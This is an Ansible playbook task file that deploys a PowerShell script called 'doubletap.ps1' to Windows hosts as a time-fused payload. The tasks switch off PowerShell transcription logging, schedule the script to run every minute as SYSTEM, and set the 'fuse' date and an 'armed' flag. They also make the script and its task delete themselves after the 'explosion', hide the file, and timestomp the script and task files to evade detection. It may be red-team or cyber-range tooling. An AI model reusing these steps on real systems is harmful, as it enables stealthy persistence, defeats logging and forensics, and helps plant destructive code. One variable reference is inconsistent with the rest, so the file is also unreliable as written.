---
#- name: Define variables for paths and filenames
#  set_fact:
#    doubletap_ps1_task_script_dest: "C:\\Windows\\Temp\\firewall_script3.ps1"
#    doubletap_ps1_task_task_name: "DoubleTapScript"

- name: Disable PowerShell logging by modifying the registry
  win_registry:
    path: "HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell"
    name: "EnableTranscripting"
    type: dword
    data: "0"
    state: present
    
- name: Copy PowerShell script to target
  win_copy:
    src: "files/doubletap.ps1"
    dest: "{{ doubletap_ps1_task_script_dest }}"

- name: Create Scheduled Task to Run Script Every Minute
  win_shell: |
    $Action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-ExecutionPolicy Bypass -File {{ doubletap_ps1_task_script_dest }}"
    $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1)
    Register-ScheduledTask -TaskName "{{ doubletap_ps1_task_task_name }}" -Action $Action -Trigger $Trigger -User "SYSTEM" -RunLevel Highest -Force
  args:
    executable: powershell.exe

- name: Update settings in the script file
  replace:
    path: "{{ doubletap_ps1_loop_script_dest }}"
    regexp: |
      ^(\$?fuse_date\s*=\s*).*|^(\$?fuse_time\s*=\s*).*|^(\$?fuse_armed\s*=\s*).*|^(\$?log_location\s*=\s*).*|
    replace: |
      $fuse_date ="{{ doubletap_fuse_date }}" # In format YYYY-MM-DD
      $fuse_time = "{{ doubletap_fuse_time }}" # In format HH:MM:SS, using 24h time
      $fuse_armed = ${{ doubletap_fuse_armed }} # DO NOT SET THIS TO TRUE UNLESS YOU WANT TO EXPLODE
      $log_location = "{{ doubletap_ps1_task_log_path }}" # Set to /dev/null for no output (and comment out line 14)

- name: Modify PowerShell script to self-delete task after execution
  win_lineinfile:
    path: "{{ doubletap_ps1_task_script_dest }}"
    line: 'Unregister-ScheduledTask -TaskName "{{ doubletap_ps1_task_task_name }}" -Confirm:$false'
    insertafter: "# Cleanup after explosion"

- name: Add script deletion at the end of the PowerShell script
  win_lineinfile:
    path: "{{ doubletap_ps1_task_script_dest }}"
    line: 'Remove-Item -Path $MyInvocation.MyCommand.Path -Force'
    insertafter: 'Log " My work here is done"''

- name: Apply hidden and system attributes to the PowerShell script
  win_shell: |
    attrib +h +s "{{ doubletap_ps1_task_script_dest }}"

- name: Timestomp script and task to evade detection
  win_shell: |
    $time = (Get-Item "C:\\Windows\\System32\\cmd.exe").CreationTime
    (Get-Item "{{ doubletap_ps1_task_script_dest }}").CreationTime = $time
    (Get-Item "{{ doubletap_ps1_task_script_dest }}").LastWriteTime = $time
    (Get-Item "{{ doubletap_ps1_task_script_dest }}").LastAccessTime = $time
  args:
    executable: powershell.exe

- name: Timestomp Scheduled Task XML
  win_shell: |
    $taskPath = "C:\\Windows\\System32\\Tasks\\{{ doubletap_ps1_task_task_name }}"
    if (Test-Path $taskPath) {
        $time = (Get-Item "C:\\Windows\\System32\\cmd.exe").CreationTime
        (Get-Item $taskPath).CreationTime = $time
        (Get-Item $taskPath).LastWriteTime = $time
        (Get-Item $taskPath).LastAccessTime = $time
    }
  args:
    executable: powershell.exe
